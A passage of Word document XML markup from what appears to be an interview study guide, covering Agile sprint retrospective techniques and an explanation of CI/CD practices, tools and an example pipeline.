          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: By identifying and addressing obstacles or inefficiencies, the team can become more productive in future sprints.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24526FC4" w14:textId="77777777" w:rsidR="00FA5412" w:rsidRPr="00617E2C" w:rsidRDefault="00FA5412"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Reflection</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It encourages reflection on both the technical and non-technical aspects of the sprint, leading to a holistic improvement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09967F15" w14:textId="77777777" w:rsidR="00FA5412" w:rsidRPr="00617E2C" w:rsidRDefault="00FA5412"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ommon Techniques for Sprint Retrospective</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D960A0A" w14:textId="77777777" w:rsidR="00FA5412" w:rsidRPr="00617E2C" w:rsidRDefault="00FA5412"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tart/Stop/Continue</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Discuss what the team should start doing, stop doing, and continue doing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="300C116D" w14:textId="77777777" w:rsidR="00FA5412" w:rsidRPr="00617E2C" w:rsidRDefault="00FA5412"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5 Whys</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Identify the root cause of problems by asking "Why" multiple times.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A055CBC" w14:textId="77777777" w:rsidR="00FA5412" w:rsidRPr="00617E2C" w:rsidRDefault="00FA5412"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Mad/Sad/Glad</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Express feelings about the sprint to identify areas that need attention.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC385D8" w14:textId="77777777" w:rsidR="00FA5412" w:rsidRPr="00617E2C" w:rsidRDefault="00FA5412"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lus/Delta</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Plus (+) for what went well and Delta (Δ) for what needs improvement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F2785F" w14:textId="77777777" w:rsidR="00FA5412" w:rsidRPr="00617E2C" w:rsidRDefault="00FA5412"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Outcome</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4600CA99" w14:textId="77777777" w:rsidR="00FA5412" w:rsidRPr="00617E2C" w:rsidRDefault="00FA5412"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ctionable Improvements</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The retrospective results in actionable improvements that can be implemented in the next sprint.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2769339D" w14:textId="77777777" w:rsidR="00FA5412" w:rsidRPr="00617E2C" w:rsidRDefault="00FA5412"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Team Growth</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The retrospective allows the team to bond and grow by addressing any issues, leading to better collaboration and morale.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09EDD452" w14:textId="77777777" w:rsidR="00FA5412" w:rsidRPr="00617E2C" w:rsidRDefault="00FA5412"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Why It’s Important:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F70FCE" w14:textId="77777777" w:rsidR="00FA5412" w:rsidRPr="00617E2C" w:rsidRDefault="00FA5412"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Sprint Retrospective helps teams avoid stagnation and fosters a culture of continuous improvement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38260649" w14:textId="77777777" w:rsidR="00FA5412" w:rsidRPr="00617E2C" w:rsidRDefault="00FA5412"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t provides a structured way for the team to acknowledge and address problems or successes from the sprint.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25CBFE0E" w14:textId="77777777" w:rsidR="00FA5412" w:rsidRPr="00617E2C" w:rsidRDefault="00FA5412"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eams can fine-tune their processes, tools, and techniques over time to become more effective in delivering high-quality results.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DDE2944" w14:textId="77777777" w:rsidR="00FA5412" w:rsidRPr="00617E2C" w:rsidRDefault="00FA5412"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In summary, a </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Sprint Retrospective</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a key Agile ceremony that promotes transparency, reflection, and continuous improvement, ensuring the team consistently evolves and enhances its performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1756A1F8" w14:textId="03FE8F8F" w:rsidR="00B66F22" w:rsidRPr="00CE4B95"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171B0E41">
          <v:rect id="_x0000_i3595" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="484EC777" w14:textId="000C81AF" w:rsidR="002B5B56" w:rsidRPr="00CE4B95" w:rsidRDefault="00060638">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="891" w:name="_Toc196308371"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Do you know anything about CI/CD</w:t>
      </w:r>
      <w:r w:rsidR="002B5B56" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="891"/>
    </w:p>
    <w:p w14:paraId="1016AB90" w14:textId="3F5BFC07" w:rsidR="006C07EF" w:rsidRPr="00617E2C" w:rsidRDefault="006C07EF" w:rsidP="00617E2C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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Yes, </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>CI/CD</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> stands for </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Continuous Integration</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Continuous Delivery/Deployment</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, and it's a set of practices and tools that help software teams to deliver code changes more frequently, reliably, and with greater quality. CI/CD is part of the DevOps culture and aims to automate and streamline the software development and release process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C07DDE"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Continuous Integration (CI)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A97D3A"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ontinuous Integration (CI)</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the practice of automatically integrating code changes from multiple contributors into a shared codebase several times a day. The key idea is to catch integration issues early and reduce the complexity of merging code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1835C9CD"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Key Aspects of CI:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="628B8BFF"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Frequent Code Commits</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Developers commit their code changes frequently (usually multiple times a day) to a shared repository.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E869D44"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utomated Builds</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Whenever a developer commits code, an automated build process is triggered. This ensures the new code integrates well with the existing code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D4BF533"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utomated Testing</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Along with the build, automated unit tests or integration tests are run to ensure that new changes don’t break existing functionality.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560A618B"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Early Detection of Issues</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Since the code is integrated and tested frequently, issues (like broken code, failing tests, or integration conflicts) are detected early.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="674CFE4A"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CI Tools:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC45333"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Jenkins</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A popular open-source automation server used to automate various tasks such as building, testing, and deploying software.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B877BB"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lastRenderedPageBreak/>
        <w:t>Travis CI</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A cloud-based CI service that integrates with GitHub repositories.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D64795"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ircleCI</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A modern CI/CD platform that automates the software delivery pipeline.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B84E258"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GitLab CI</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: CI tool integrated into the GitLab platform for automating builds, testing, and deployments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53EBFAD2"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Continuous Delivery (CD)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F02349D"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ontinuous Delivery (CD)</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the practice of automatically preparing code for release to production. It extends CI by ensuring that the codebase is always in a deployable state, and the deployment to production is fully automated, though the release may still require a manual trigger.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A93B36"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Key Aspects of CD:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="215147BB"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utomated Deployments</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: After passing through CI processes (build and test), the application is automatically deployed to staging or production environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4639A4DA"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Frequent Releases</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: With CD, teams can release new features or bug fixes rapidly and with confidence.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C7629D2"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Rollback Capabilities</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: In case of a failed release, the system supports rollback mechanisms to revert to the previous working version.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C2F22F9"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taging and Production Pipelines</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The software is tested in a staging environment, which mirrors the production environment, ensuring the system works well before going live.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="475D8173"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CD Tools:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="693BEE32"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pinnaker</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: An open-source multi-cloud continuous delivery platform that helps in deploying software to cloud platforms.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B2DD0B3"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rgo CD</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A Kubernetes-native continuous delivery tool.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67AC4961"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Octopus Deploy</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A popular deployment automation tool that works well with CI systems to automate the delivery of applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5787ECB9"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Continuous Deployment (CD)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="149150EC"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ontinuous Deployment (CD)</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> goes a step further than Continuous Delivery by automating the entire release process, including pushing code directly to production once it passes all testing and checks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25DA2DCD"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Key Aspects of Continuous Deployment:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E1BD090"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utomatic Production Releases</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Once the code passes all tests and checks, it is automatically deployed to production without human intervention.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C1CFBE7"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Rapid Feedback Loop</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This allows teams to release new features, improvements, or fixes almost immediately to end users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF8B3B9"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onfidence and Reliability</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Automated tests and monitoring ensure that the release will be reliable, reducing the risk of introducing bugs or errors into production.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76137BC6"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Benefits of CI/CD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64804447"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Faster Time to Market</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: With automated testing and deployment pipelines, new features and fixes are delivered quickly to users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C8409F"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Better Software Quality</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Continuous testing ensures that bugs are caught early, reducing the likelihood of defects in production.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4863CBA8"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Reduced Risk</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Smaller, more frequent releases reduce the risk of major issues. If a problem arises, it’s easier to identify and roll back changes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3788D934"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Improved Collaboration</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Developers, testers, and operations teams can collaborate more effectively, knowing the code is continuously integrated, tested, and delivered.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18016C52"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Increased Developer Productivity</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: By automating manual steps, developers spend more time writing code and less time on repetitive tasks like manual testing or deployment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A543C2"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Example CI/CD Pipeline</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24252545"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Developer commits code to the repository</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (GitHub, GitLab, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40139FF5"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I server</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (like Jenkins or Travis) is triggered and builds the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BEC5651"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The application is </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>automatically tested</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (unit tests, integration tests, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B832DF"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If tests pass, the code is deployed to a </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>staging environment</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69847FDB"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In the case of </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Continuous Delivery</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, the code is then available for manual release to production.</w:t>
      </w:r>
    </w:p>
